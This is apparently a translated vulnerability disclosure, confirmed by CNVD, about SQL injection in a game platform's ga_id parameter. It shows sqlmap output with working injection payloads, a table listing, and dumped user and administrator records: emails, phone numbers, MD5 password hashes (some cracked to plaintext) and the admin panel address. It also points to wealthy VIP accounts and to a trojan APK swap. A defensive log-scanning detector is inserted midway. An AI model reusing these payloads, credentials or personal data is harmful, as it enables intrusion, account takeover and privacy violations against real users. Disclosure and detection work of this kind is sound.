2015-08-04: Details reported to the vendor; awaiting vendor handling
2015-08-07: Vendor confirmed; details disclosed to the vendor only
2015-08-17: Details disclosed to core white hats and relevant domain experts
2015-08-27: Details disclosed to regular white hats
2015-09-06: Details disclosed to intern white hats
2015-09-21: Details disclosed to the public

Member information is leaked, including many users with paid-up balances; the access could be used for money laundering and to upload a trojanized APK.

Injection point:

http://www.caohua.com/zoning/zo_ga_list?ga_id=1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ga_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ga_id=1 AND 3417=3417

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, PHP 5.4.24
back-end DBMS: MySQL >= 5.0.0
available databases [4]:
[*] `\\ckc\x0b`
[*] `\x15\x11%I\x1b&'iJ`
[*] `J\x03"\x13S`
[*] information_schema
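The three payload classes sqlmap reports above (boolean-based, error-based and time-based blind) each leave a recognisable trace in the web server's access log, and all three share one property: they put something other than an integer into a parameter that should only ever be an integer. The following detector is an added example written for this page, not code from the report or from the site's operators. It assumes nginx's default "combined" log format and that `ga_id` is the one numeric parameter being policed; the log lines are constructed samples that mirror the payloads shown above, with made-up addresses and timestamps.

```python
"""Flag SQL-injection probes against an integer GET parameter in nginx access logs.

Added example, not part of the original report. It recognises the three payload
classes sqlmap reported for ga_id and, more generally, any non-integer value sent
for a parameter that is supposed to be numeric.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Assumption (this example's, not the report's): ga_id on /zoning/zo_ga_list is
# the only parameter that must be an integer, so any other shape is suspicious.
NUMERIC_PARAMS = {"ga_id"}

# Signatures for the three payload classes in the sqlmap output.
SIGNATURES = (
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA\.", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(|\bBENCHMARK\s*\(", re.I)),
)

# nginx "combined" format: ip - user [time] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def classify(value: str) -> list:
    """Return the names of the signatures that match a decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def inspect_line(line: str):
    """Return a finding dict for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for param, values in parse_qs(query, keep_blank_values=True).items():
        if param not in NUMERIC_PARAMS:
            continue
        for raw in values:
            # parse_qs already decoded once; a second pass catches double-encoding.
            value = unquote_plus(raw).strip()
            if value.lstrip("-").isdigit():
                continue  # a plain integer is what this parameter should carry
            return {
                "ip": m.group("ip"),
                "time": m.group("time"),
                "param": param,
                "value": value,
                "kinds": classify(value) or ["non-numeric value"],
                "status": int(m.group("status")),
            }
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the findings."""
    return [f for f in (inspect_line(line) for line in lines) if f]


# Constructed sample log: two ordinary requests and one probe per payload class.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Aug/2015:10:00:01 +0800] "GET /zoning/zo_ga_list?ga_id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Aug/2015:10:00:02 +0800] "GET /zoning/zo_ga_list?ga_id=1%20AND%203417%3D3417 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Aug/2015:10:00:03 +0800] "GET /zoning/zo_ga_list?ga_id=1%20AND%20(SELECT%204565%20FROM(SELECT%20COUNT(*),CONCAT(0x716a627671,(SELECT%20(ELT(4565%3D4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 200 6240 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Aug/2015:10:00:14 +0800] "GET /zoning/zo_ga_list?ga_id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))MRAA) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Aug/2015:10:00:20 +0800] "GET /zoning/zo_ga_list?ga_id=42 HTTP/1.1" 200 4880 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["param"], finding["kinds"])
```

The signatures only catch probes shaped like the ones sqlmap sent here; the generic check (anything non-integer in `ga_id`) is the one worth keeping in production, since it does not depend on how a tool spells its payload. The actual fix is on the application side: the `ga_id` value has to be bound as an integer in a prepared statement rather than concatenated into the query.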
The database names come back garbled, so query the current database instead.
current database: 'phpcaohua'
Database: phpcaohua
[45 tables]
+-----------------------+
| c_account             |
| c_active_use          |
| c_ads_class           |
| c_article             |
| c_article_type        |
| c_branch              |
| c_certified           |
| c_channel_account     |
| c_channel_bank        |
| c_channel_pick        |
| c_chat_record         |
| c_comment             |
| c_data_channel_total  |
| c_data_uchannel_total |
| c_down_games          |
| c_focus               |
| c_game_info           |
| c_game_type           |
| c_games_pay           |
| c_games_user          |
| c_group_buy           |
| c_group_level         |
| c_login_admin         |
| c_maintain_vip        |
| c_manage_user         |
| c_package             |
| c_package_rev         |
| c_package_type        |
| c_pay_order           |
| c_pl_access           |
| c_pl_game_users       |
| c_pl_pay_order        |
| c_play_appoint        |
| c_privilege           |
| c_produce             |
| c_produce_sale        |
| c_question            |
| c_question_write      |
| c_rank                |
| c_role                |
| c_role_privilege      |
| c_user                |
| c_user_v              |
| c_wealth_log          |
| c_ztactivs_user       |
+-----------------------+

Database: phpcaohua
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| c_package         | 212311  |
| c_wealth_log      | 198542  |
| c_package_rev     | 155527  |
| c_user            | 62338   |
| c_account         | 62287   |
| c_pay_order       | 34990   |
| c_question_write  | 1248    |
| c_game_info       | 48      |
| c_focus           | 41      |
| c_ads_class       | 22      |
| c_article_type    | 20      |
| c_rank            | 11      |
| c_branch          | 7       |
| c_group_buy       | 6       |
| c_maintain_vip    | 6       |
| c_role            | 5       |
| c_group_level     | 4       |
| c_produce         | 4       |
| c_channel_account | 1       |
+-------------------+---------+
Database: phpcaohua
Table: c_user
[12 entries]
+-------------------+---------------------------------------------+----------------------------------+-------------+
| email             | password                                    | uce_pass                         | login_name  |
+-------------------+---------------------------------------------+----------------------------------+-------------+
| NULL              | E25B2B1BAC165D1949405E9B6DC8FC15            | 00002961                         | joycegong   |
| 2856023741@qq.com | AFAB92058AA1762FA6D58C90CC6B6FF5            | 0196454653c67b25b82711c686a66817 | 15190225806 |
| zsj999@163.com    | 2D3CD0366343ACCC04B8AF4C88F803D1            | NULL                             | 85357858aa  |
| NULL              | 3B814C816BC7C23A11CA8CC52ECB0F04            | fjm15190225806                   | 18227201760 |
| NULL              | 5E1A52C3A8C0BD0D6BABAB68D1E71D05            | NULL                             | 13754637142 |
| <blank>           | 7D92D378826BAFAFE7A3DFA0C2A11884            | NULL                             | 17701620813 |
| NULL              | 7B0DBBEBCE6EB50E8865CC3B23B1045F            | NULL                             | 13739571720 |
| 105322355@qq.com  | 7FEF6171469E80D32C0559F88B377245 (admin888) | admin888                         | 13753522369 |
| NULL              | DD4B21E9EF71E1291183A46B913AE6F2 (00000000) | 00000000                         | admin       |
| NULL              | F805CF9589D118D8B804DF78F0AA67DA            | 211847                           | 4352698     |
| NULL              | E10ADC3949BA59ABBE56E057F20F883E (123456)   | 123456                           | 2726084746  |
| NULL              | A68AE418CFD0110DACEFCB0A39970A56            | lw851227                         | jiulidao    |
+-------------------+---------------------------------------------+----------------------------------+-------------+
Now the administrators:
Database: phpcaohua
Table: c_manage_user
[8 entries]
+-------------------------------------------+--------------+------------------+---------------+
| manage_pass                               | manage_user  | manage_email     | manage_mobile |
+-------------------------------------------+--------------+------------------+---------------+
| 6e0a72004b1c7ef6f34ca5604ebadcb2          | caohuahupeng |                  | 18711063293   |
| 759a73c078112460fae616557770fd04          | 28yAndyFei   |                  | 13787173861   |
| e10adc3949ba59abbe56e057f20f883e (123456) | cindy2140    |                  | 18621761232   |
| 65fc5b5480d6da94787380c8c6c523b9          |              | fulei@caohua.com | 18666663256   |
| 0399f77aa65c238918b841dd3a1f028e          |              |                  |               |
+-------------------------------------------+--------------+------------------+---------------+
Admin panel address:
http://www.caohua.com/admin.php
Gift packs can be claimed at will.

The APK here can be replaced with a trojan; the consequences would be severe.

There are a lot of big spenders; many wealthy users inside.

Take a look at the VIP10 users.

I hope the vendor takes this seriously; otherwise it is very serious.
Severity: High

Vulnerability Rank: 11

Confirmation time: 2015-08-07 09:40

CNVD has confirmed and reproduced the described situation, and has notified the website's operating organization (the software vendor) through the contact details published on the website (or a previously established handling channel).

None yet